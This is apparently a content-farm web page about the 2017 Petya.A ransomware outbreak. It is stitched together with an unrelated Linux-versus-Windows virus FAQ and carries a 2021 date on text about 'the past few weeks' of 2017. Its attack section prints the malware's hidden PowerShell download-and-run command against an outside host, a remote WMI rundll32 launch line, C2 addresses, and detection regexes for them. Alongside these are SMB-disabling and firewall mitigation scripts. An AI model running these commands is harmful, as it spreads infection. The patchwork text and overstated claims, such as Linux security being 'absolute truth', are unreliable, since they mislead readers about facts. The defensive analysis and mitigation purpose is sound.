SMB CVE-2017-0144: what to do. How to protect yourself from the Petya.A virus? (step-by-step instructions)

22.08.2021

That's nonsense.

This case just seems to hint, guys, that besides Windows there is also Linux, which, by the way, is free and on which such things are practically impossible.
By the way, I would have switched to Linux long ago, but development is holding me back. I don't know how to move my projects there or find a suitable development environment.

Here is a quote taken from the site:

It is believed that Unix systems are much better protected from computer viruses than Windows operating systems. To this day there is no widespread virus for Linux, while the Windows environment is simply teeming with all sorts of infections. This is largely due to the access rights system of *nix platforms, the absence (in many distributions) of pre-installed network services that accept incoming connections, and the fact that vulnerabilities in Linux are fixed very quickly. But despite all the above arguments, viruses can still settle in insufficiently protected *nix systems and do their dirty work.

And now I will give answers to the most common questions about viruses on Linux.
1. Do viruses for Linux exist at all?
Of course they do, but their number is negligible compared to the Windows operating system.

2. Can Windows viruses infect a Linux OS?
Of course they can, but only if Wine is installed, which is a kind of environment for running Windows applications. In my practice there was a case when the viruses in the .wine folder multiplied so much that there were more than 17,000 of them, with a total size of just over 1 GB. But these viruses do no harm to Linux systems: they can only operate in a Windows environment. Whereas in Windows you would need to install, for example, an antivirus and scan the system, and it is not certain that everything would work afterwards, in Ubuntu I simply deleted the .wine folder and then installed the necessary Windows programs again. My Ubuntu was not affected in any way by the large number of Windows viruses.

3. Is it true that Linux is more secure than Windows?
Yes, this is the absolute truth. Let me give you an example. There is an opinion that there are few viruses on Linux because its share of the operating system market is extremely small, and that viruses are written for Windows because of its great popularity and prevalence; if Linux were more popular, a bunch of viruses would have been written for it as well. But that is not true. If we take the most popular web server software, it is Apache. As of 2013, Apache's share of web servers is almost 45%, while Microsoft's IIS has a 23.10% market share. It would follow that hacker attacks should be more active against the larger number of Internet resources running on Apache, and we should see more worms, viruses and other malware targeting Apache and the operating systems it runs on than Windows and IIS. But in real life things are different: for a long time now it is Microsoft's IIS that has been the target of network worms and all kinds of attacks.

The main advantages of Linux in terms of security:

  • Very few viruses have been created for *nix platforms;
  • There is a large number of different Linux distributions. Some work with .deb packages, others with .rpm packages. Creating a virus that works equally well in all of them is very difficult;
  • Different distributions ship different sets of default software, compiled differently, which also reduces the likelihood of mass infection by a virus;
  • Programs downloaded from the Internet are not executable in Linux by default; they must first be made executable;
  • The main source of software in Linux is verified (official) repositories. This gives us the right to assert that the likelihood of viruses entering these sources is extremely low.

There is a new ransomware epidemic on the Internet. The malware has practically paralysed dozens of large companies, demanding just under $400 to decrypt the hard drive of each workstation.

The panic generated by the new epidemic created information chaos: first, anti-virus analysts announced the second coming of WannaCry, then the malware was identified as a newly assembled combination of the "Petya" and "Misha" encryption viruses. At this point it is clear that if the virus was based on Petya, it was heavily modified.

The distribution model is partly similar to WannaCry: an exploit for the MS17-010 vulnerability is used, supplemented by social engineering that relies on a vulnerability in MS Word. Infection occurs after a user opens an email attachment or downloads a file that exploits the CVE-2017-0199 vulnerability published in April 2017. Distribution to other computers on the network is then ensured by a whole set of techniques:

  • stealing user passwords or using active sessions to access other network nodes (Mimikatz utility code is used);
  • through a vulnerability in SMB (CVE-2017-0144, MS17-010), using the same famous EternalBlue exploit that was successfully used in WannaCry.

The malware uses stolen accounts to copy its body into admin$ shares and launches it using the legitimate PsExec utility, which is used for remote computer administration.

The developer of the well-known Mimikatz program confirmed that a modified version of its code is used to extract passwords.



Code that uses the WMI interface to run the installation was also published on the Microsoft blog.

Infection via the SMB vector uses the CVE-2017-0144 vulnerability, similar to the technique used in WannaCry.

But the encryption model has changed significantly compared to WannaCry. Once it has penetrated the computer, the virus infects the MBR (master boot record) of the system and encrypts the first few blocks of the hard drive, including the Master File Table, making the user's entire HDD inaccessible, and not just individual files, as ransomware viruses usually do.

It’s definitely not worth paying a ransom to extortionists, and not only for ethical reasons: virus analysts have come to the conclusion that decrypting files after paying a ransom is in principle impossible. This function is simply not included in the malware. In fact, this is not an epidemic of ransomware, but an epidemic of a wiper virus that destroys data.

According to media reports in Russia, the greatest problems were encountered in the Rosneft corporation; the main websites of the corporation and the Bashneft website were disabled for a long time.

Massive infections have been recorded in France, Spain, Russia, and CIS countries. In Ukraine, dozens of government and commercial organizations have been affected by the virus.

Who needs it?

Since a recovery mechanism was not included in the code, there are three possible motives for the attackers. Either they wanted to disguise the targeted destruction of someone's specific data as a mass epidemic, or they wanted to make money without ever intending to restore anything. The least likely option is cyber vandalism: a virus like this is a serious product, and it would be wiser to spend the effort of creating it on something that brings in money. Vandals were common in the 1990s, when it was fashionable to break systems for fame, but they are now extremely rare.

As a result, the main beneficiary of the epidemics of the last two months was apparently The Shadow Brokers, the group that distributed the EternalBlue exploit. The extortionists themselves collected relatively small amounts of money, several orders of magnitude less than the damage caused by the epidemic. The epidemics have become great advertising for The Shadow Brokers, who claim they are ready to sell information about the remaining exploits from the NSA archive. After all, EternalBlue is just one exploit out of dozens stolen from the agency in August 2016.

Attack Mechanism

An attacker sends files or links to them (at the initial stage of the epidemic these were the files Petya.apx, myguy.exe, myguy.xls and Order-[any date].doc), through which a workstation running Windows is infected. For example, when the file Order-[any date].doc is opened, the server 84.200.16.242 is contacted on port 80 and an xls is downloaded:

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe");" (PID: [process id], Additional Context: (System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\[random number].exe") ;)

The malware then tries to connect to servers 111.90.139.247:80 and COFFEINOFFICE.XYZ:80, which are possibly command and control servers.

Indicators of compromise are the presence of files:

C:\Windows\perfc.dat
C:\myguy.xls.hta

After attaching to the host, it scans other Windows machines on the network and spreads using the vulnerabilities described in MS17-010 (the same ones that WannaCry used) on ports tcp:135, tcp:139, tcp:445, tcp:1024-1035.

Distribution can also occur by executing the following command via remote WMI:

process call create "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\" #1"


The infection spread diagram is taken from blog.kryptoslogic.com
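As an added example that is not part of the original article, the PowerShell rule set below matches process-creation log lines against the execution chain described above: the hidden PowerShell download from the indicator host, remote WMI process creation, the rundll32 launch of perfc.dat and PsExec aimed at a remote host. The "host|user|command line" log format and the sample lines are constructed here for the demonstration.

```powershell
# Added example, not code from the article: match process-creation log lines against
# the execution chain described above. The "host|user|command line" format and the
# sample lines are constructed for this demonstration.

$Indicators = @(
    @{ Name = 'rundll32 launch of perfc.dat export #1';
       Pattern = '(?i)rundll32\.exe.*perfc\.dat.*#1' },
    @{ Name = 'hidden PowerShell download from indicator host';
       Pattern = '(?i)WindowStyle Hidden.*DownloadFile\(.*french-cooking\.com/myguy\.exe' },
    @{ Name = 'remote WMI process creation';
       Pattern = '(?i)wmic.*/node:.*process call create' },
    @{ Name = 'PsExec launched against a remote host';
       Pattern = '(?i)psexec(\.exe)?\s+\\\\\S+' }
)

function Find-PetyaIndicators {
    param([string[]]$LogLines)
    # One result object per (line, rule) match; a single line may trip several rules,
    # e.g. a WMI call whose payload is the rundll32/perfc.dat command.
    $hits = foreach ($line in $LogLines) {
        $fields = $line -split '\|', 3      # host, user, command line
        foreach ($ioc in $Indicators) {
            if ($fields[2] -match $ioc.Pattern) {
                [pscustomobject]@{ Host = $fields[0]; User = $fields[1]; Rule = $ioc.Name }
            }
        }
    }
    return @($hits)
}

# Constructed sample log: two benign lines and three lines reproducing the commands
# observed in the article (the URL is kept defanged as on the page).
$SampleLog = @(
    'WS-01|alice|C:\Windows\System32\notepad.exe report.txt',
    'WS-02|bob|powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "C:\Users\bob\AppData\Roaming\10807.exe")',
    'WS-02|bob|wmic /node:WS-03 process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1"',
    'WS-03|SYSTEM|C:\Windows\System32\rundll32.exe "C:\Windows\perfc.dat" #1',
    'WS-04|svc|svchost.exe -k netsvcs'
)

Find-PetyaIndicators -LogLines $SampleLog | Format-Table -AutoSize
```

The WMI line is reported twice, once per rule it matches, which is the behaviour you want when the payload of a remote process call is itself an indicator.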

How to avoid infection?

french-cooking.com:80
84.200.16.242:80
111.90.139.247:80
COFFEINOFFICE.XYZ:80

Petya.apx, myguy.exe, myguy.xls, Order-[any date].doc

3. Install patches

4. Configure IPS to block exploits for MS17-010

5. To protect hosts that have not yet been infected, you can create a file c:\windows\perfc without an extension. Such nodes are not infected.

Infection is attempted using the well-known vulnerability in the SMB protocol (MS17-010).

As a preventive measure, you can disable the SMB (Server Message Block) protocols on the local computer.

How to disable SMB protocol version 1 on the local computer:

– run the Command Prompt as an administrator;

– in the Administrator: Command Prompt window that opens, after the system prompt (C:\Windows\System32>) enter the command

sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi

– press the Enter key;

– the message ChangeServiceConfig: success will appear;

– after the system prompt (C:\Windows\System32>) enter the command

sc.exe config mrxsmb10 start= disabled

– press the Enter key;

– the message ChangeServiceConfig: success will appear;

– close the window.

How to disable SMB protocols version 2 and 3 on the local computer:

– run the Command Prompt as an administrator;

– in the Administrator: Command Prompt window that opens, after the system prompt (C:\Windows\System32>) enter the command

sc.exe config lanmanworkstation depend= bowser/mrxsmb10/nsi

– press the Enter key;

– the message ChangeServiceConfig: success will appear;

– after the system prompt (C:\Windows\System32>) enter the command

sc.exe config mrxsmb20 start= disabled

– press the Enter key;

– the message ChangeServiceConfig: success will appear;

– close the window.

How to enable SMB version 1 protocol on the local computer:

– run the Command Prompt as an administrator;

– in the Administrator: Command Prompt window that opens, after the system prompt (C:\Windows\System32>) enter the command

sc.exe config lanmanworkstation depend= bowser/mrxsmb10/mrxsmb20/nsi

– press the Enter key;

– the message ChangeServiceConfig: success will appear;

– after the system prompt (C:\Windows\System32>) enter the command

sc.exe config mrxsmb10 start= auto

– press the Enter key;

– the message ChangeServiceConfig: success will appear;

– close the window.

How to enable SMB version 2 and 3 protocols on the local computer:

– run the Command Prompt as an administrator;

– in the Administrator: Command Prompt window that opens, after the system prompt (C:\Windows\System32>) enter the command

sc.exe config lanmanworkstation depend= bowser/mrxsmb10/mrxsmb20/nsi

– press the Enter key;

– the message ChangeServiceConfig: success will appear;

– after the system prompt (C:\Windows\System32>) enter the command

sc.exe config mrxsmb20 start= auto

– press the Enter key;

– the message ChangeServiceConfig: success will appear;

– close the window.

Notes

1. After making these changes (enabling or disabling SMB protocols), you must reboot.

2. Enabling or disabling SMB version 2 in Windows also enables or disables SMB version 3. This is due to the use of a common stack for these protocols.

3. Disabling SMB version 2 will disable some Windows functionality.

4. Microsoft does not recommend disabling SMB protocol version 2 or 3. Disabling SMB version 2 or 3 should only be used as a temporary troubleshooting measure; do not leave SMB version 2 or 3 disabled for long periods of time.
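The host-level measures from the list above (the extension-less perfc file, the SMBv1 sc.exe commands and closing the listed TCP ports), gathered into one elevated PowerShell script as an added example that is not part of the original instructions. The firewall rule name is a label chosen here; the paths, service names and port numbers are the ones the page gives.

```powershell
# Added example, not from the page: apply the article's host mitigations against the
# Petya.A SMB vector. Run in an elevated PowerShell; a reboot completes the SMBv1 change.
#Requires -RunAsAdministrator

function New-PerfcKillSwitch {
    # The article reports that an extension-less C:\Windows\perfc file stops the malware
    # from running; create it empty and mark it read-only so it is not silently replaced.
    $path = Join-Path $env:SystemRoot 'perfc'
    if (-not (Test-Path -LiteralPath $path)) {
        New-Item -ItemType File -Path $path -Force | Out-Null
    }
    Set-ItemProperty -LiteralPath $path -Name IsReadOnly -Value $true
    return (Get-Item -LiteralPath $path)
}

function Disable-Smb1Client {
    # The same two sc.exe commands the article gives for SMBv1. Note the mandatory
    # space after '=' in sc.exe argument syntax.
    & sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi | Out-Null
    & sc.exe config mrxsmb10 start= disabled | Out-Null
    # Return the driver's configured start type so the change can be verified (DISABLED).
    return ((& sc.exe qc mrxsmb10) | Select-String 'START_TYPE').Line.Trim()
}

function Block-PetyaLateralPorts {
    # Inbound TCP ports the article names for MS17-010 / WMI / PsExec spread. Blocking
    # 445 also stops inbound file sharing on this host, so use on workstations, not file servers.
    $ports = @('135', '139', '445', '1024-1035')
    $name  = 'Block-Petya-Lateral-Movement'   # hypothetical rule name chosen here
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $name -Direction Inbound -Protocol TCP `
            -LocalPort $ports -Action Block -Profile Any | Out-Null
    }
    return Get-NetFirewallRule -DisplayName $name
}

New-PerfcKillSwitch
Disable-Smb1Client
Block-PetyaLateralPorts
Write-Host 'Mitigations applied; reboot to complete the SMBv1 change.'
```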

Over the past few weeks the digital world has experienced several serious virus attacks. In mid-May, mass infection of computers with the WannaCry virus began. This malware is designed to extort money: it encrypts all user data on a computer running the operating system, after which the owner of the infected PC is offered a decryption key for a ransom of around $300 (in the Bitcoin cryptocurrency). More recently another no less dangerous virus appeared, Petya.A. It uses a Microsoft digital signature and disguises itself as a licensed Windows application.

Like WannaCry, it exploits the system vulnerability known as EternalBlue (CVE-2017-0144), and uses the WMI and PsExec system tools. Unlike its May predecessor it has no remote kill switch, it is much more cunning, and it has extensive capabilities for automatic distribution.

How do you know if your computer is infected with Petya.A?

The personal computer reboots on its own, after which it displays a screen with a fake hard drive check by the CHKDSK system utility. While the user is supposedly waiting for the scan to complete, the virus is encrypting all data on the disks. After the encryption process is completed, a message with a ransom demand appears on the screen.

How to protect yourself from the Petya.A virus?

The first rule, relevant for all users at all times: do not open emails from unknown senders. This is especially true for emails with attached files. To prevent the spread of the virus, the user should disable the SMB v1/v2/v3 protocols in advance; how to do this is described in the official instructions. It is also necessary to close TCP ports 1024 to 1035, as well as 135 and 445.


  • C:\Windows\perfc.dat

  • C:\myguy.xls.hta

  • %APPDATA%\10807.exe

Network security specialists noticed an interesting feature: if you create a perfc file (without an extension) in the operating system folder, this prevents the virus from running on the personal computer. If the computer reboots spontaneously and the disk scan begins, you must immediately turn it off and disconnect the PC from the network to avoid infecting other machines. If possible, make a copy of your data and try to restore the bootloader using the bootrec system utility, booting from a disk or a system flash drive.